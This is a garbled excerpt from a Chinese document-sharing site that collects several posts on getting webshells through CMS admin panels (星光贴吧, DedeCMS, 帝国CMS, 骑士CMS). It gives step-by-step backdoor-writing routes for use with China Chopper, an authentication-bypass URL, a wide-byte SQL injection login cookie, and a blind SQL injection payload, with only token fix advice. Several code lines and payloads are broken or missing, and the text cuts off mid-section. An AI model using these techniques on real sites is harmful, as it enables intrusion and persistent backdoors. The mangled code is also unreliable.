该【2025年星光贴吧1.3后台拿SHELL及修复方案漏洞预警(锦集12篇) 】是由【wawa】上传分享,文档一共【15】页,该文档可以免费在线阅读,需要了解更多关于【2025年星光贴吧1.3后台拿SHELL及修复方案漏洞预警(锦集12篇) 】的内容,可以使用淘豆网的站内搜索功能,选择自己适合的文档,以下文字是截取该文章内的部分文字,如需要获得完整电子版,请下载此文档到您的设备,方便您编辑和打印。(锦集12篇)
篇1: 后台拿SHELL及修复方案漏洞预警
by:风之传说
今天分析了两个程序,都发了吧,
好吧,我承认有点鸡肋。。
我们先来看看这个文件
/
01functionwrite_file($l1,$l2=''){ //写文件
02 $dir= dirname($l1);
03 if(!is_dir($dir)){
04 mkdirss($dir);
05 }
06 );
07}
08functionread_file($l1){
09 );
10}
11// 数组保存到文件
12functionarr2file($filename,$arr=''){
13 if(is_array($arr)){
14 $con= var_export($arr,true);
15 }else{
16 $con=$arr;
17 }
18 $con=“
19 write_file($filename,$con);
20}
上面是定义的函数,我们主要看write_file这个函数,OK我们再来看看后台的一个文件l
1$array=$_POST; //POST提交的数组赋值给$array
2 if(!empty($array['ads_name_sub'])){
3 if($this->model->table('ads')->where(' adsname=”'.trim($_POST['ads_name_sub']).'“')->find){
4 $this->error('该广告标识已经存在,请重新填写一个广告标识!');
5 }
6 $data['adsname'] = trim($array['ads_name_sub']); //文件名
7 $data['adscontent'] =stripslashes(trim($array['ads_content_sub'])); //内容
8 $this->model->table('ads')->data($data)->insert($data);
9 write_file(ROOT_PATH.'/data/ads/'.$data['adsname'].'.js',t2js($data['adscontent'])); //写SHELL
进入后台, /admin/
然后广告识别码填:
广告内容填:
/data/ads/ 就可以看到我们可爱的马了,
。
所以说鸡肋,但是也是拿SHELL的一种方法。
修复:过滤这两项输入内容
篇2:常用的后台上传拿shell漏洞预警
有的时候进入后台了,拿shell也可能是你羁绊,有编辑器的话,再具体说吧,万一编辑器是精简版的或者是漏洞修补的FCK,只能利用一些小的上传点了,可不要小看这些上传点。
能不能利用的NC提交,其实NC提交已经反锁了,利用opera浏览器或者使用suitbute更为简洁。那一般说来什么情况下可以如此使用呢,看源代码
出现类似filepath value=”upload”就爽歪歪了,试着修改value=“;”
出现类似filename value =”1312321321″ ,试着修改value=””
如果还不行的可是在后面加上一个空格或者;试试
篇3:dedecms
漏洞说明:dedecms ,;相当的鸡肋,前提是有了后台权限,由于系统自带的文件管理器插件没有过滤文件上传及编辑后保存的文件名,导致直接写入webshell漏洞。
方法一见:
关键词:Powered by DedeCMSV57_GBK
漏洞测试:
1、进入后台,默认的是dede,,左边导航栏目,选择模块>辅助插件>文件管理器(系统默认安装的,如果没有请在插件管理器中自行安装)>然后选择新建文本(或者文件上传)……
如上图:文件名称随便填,;内容出填写一句话;菜刀连接,
下面的上传也一样,没有过滤文件扩展名,导致上传任意文件。
漏洞修复:
DEDECMS安全性终极设置
漏洞相关:
DedeCms 两处XSS跨站漏洞
DedeCMS鸡肋漏洞之任意修改文章
DedeCms 恶意代码执行漏洞
织梦(DedeCMS)支付页面SQL注入漏洞
篇4:ZCMS final后台验证绕过漏洞及修复方案漏洞预警
简要描述:
文件逻辑错误
详细说明:
漏洞证明:
?u=admin&t=1&s=ff1168b33fe9e33841bb9814c58a098d
修复方案:
删除漏洞文件
漏洞作者: tnt1200
篇5: 建站系统后台拿shell漏洞预警
这个建站系统还不错,从后台来看是仿马克思的cms
后台--系统--网站配置-- 随便找个位置插入闭合式一句话,
连接地址:localhost/inc/
再用菜刀连接就OK了
篇6:帝国cms 后台拿shell漏洞预警
,
进入后台~!
方法一:系统——数据表与系统模型——管理数据表 再随意选择一个数据表,打开对应数据表的“管理系统模型”如图:
“导入系统模型”,可进入“”页面,如图:
在本地新建一个文件,文本内容为
,导入这个mod文件,即执行里面的php代码,,
可以从导入系统模型源文件中查看到,如图:
方法二:
(任意php文件)其源码内容为
,将此文件按照方法一导入系统模型
,迅速查看源码即可得知网站根目录的绝对路径,如图:
然后
系统——备份与恢复数据——执行SQL语句在执行SQL语句框中输入如下代码:
即可在网站根目录生成 菜刀连接即可~!
篇7:骑士cms注入及后台拿shell漏洞预警
0x1 任意用户登录
0x2 盲注
0x3 后台拿shell
0x4 随机函数问题
详细说明:
0x1 任意用户登录
user/
elseif((empty($_SESSION['uid']) || empty($_SESSION['username']) || empty($_SESSION['utype'])) && $_COOKIE['QS']['username'] && $_COOKIE['QS']['password'] && $_COOKIE['QS']['uid'])
{
if(check_cookie($_COOKIE['QS']['username'],$_COOKIE['QS']['password']))
{
update_user_info($_COOKIE['QS']['uid'],false,false);
header(”Location:“.get_member_url($_SESSION['utype']));
}
else
{
unset($_SESSION['uid'],$_SESSION['username'],$_SESSION['utype'],$_SESSION['uqqid'],$_SESSION['activate_username'],$_SESSION['activate_email'],$_SESSION[”openid“]);
setcookie(”QS[uid]“,”“,time - 3600,$QS_cookiepath, $QS_cookiedomain);
setcookie('QS[username]',”“, time() - 3600,$QS_cookiepath, $QS_cookiedomain);
setcookie('QS[password]',”“, time() - 3600,$QS_cookiepath, $QS_cookiedomain);
setcookie(”QS[utype]“,”“,time() - 3600,$QS_cookiepath, $QS_cookiedomain);
header(”Location:“.url_rewrite('QS_login'));
}
}
include/
//检测COOKIE
function check_cookie($name,$pwd){
global $db;
$row = $db->getone(”SELECT COUNT(*) AS num FROM “.table('members').” WHERE username='{$name}' and password = '{$pwd}'“);
if($row['num'] > 0)
{
return true;
}else{
return false;
}
}
构造cookie如下
QS[uid] 2
QS[utype] 1
QS[password] 1111111111**********
QS[username]%bf%27 or 1=1 %23
uid 为假冒用户的ID utype为用户类型password任意
0x2 盲注
//resume/resume-?key=test00%bf')/**/and+if((select/**/admin_name/**/from/**/qs_admin/**/limit/**/0,1)=0x61646D696E,benchmark(1000000000,(select/**/1)),1)/**/%23
上面两个都是宽字节注入,如果你能猜出管理员密码,还能解出双重md5的话,还能猜出后台路径,继续看下面
0x3 后台拿shell
,内容为
-计划任务中添加任务,脚本任务填../../data/hrtools//06/
2025年星光贴吧1.3后台拿SHELL及修复方案漏洞预警(锦集12篇) 来自淘豆网m.daumloan.com转载请标明出处.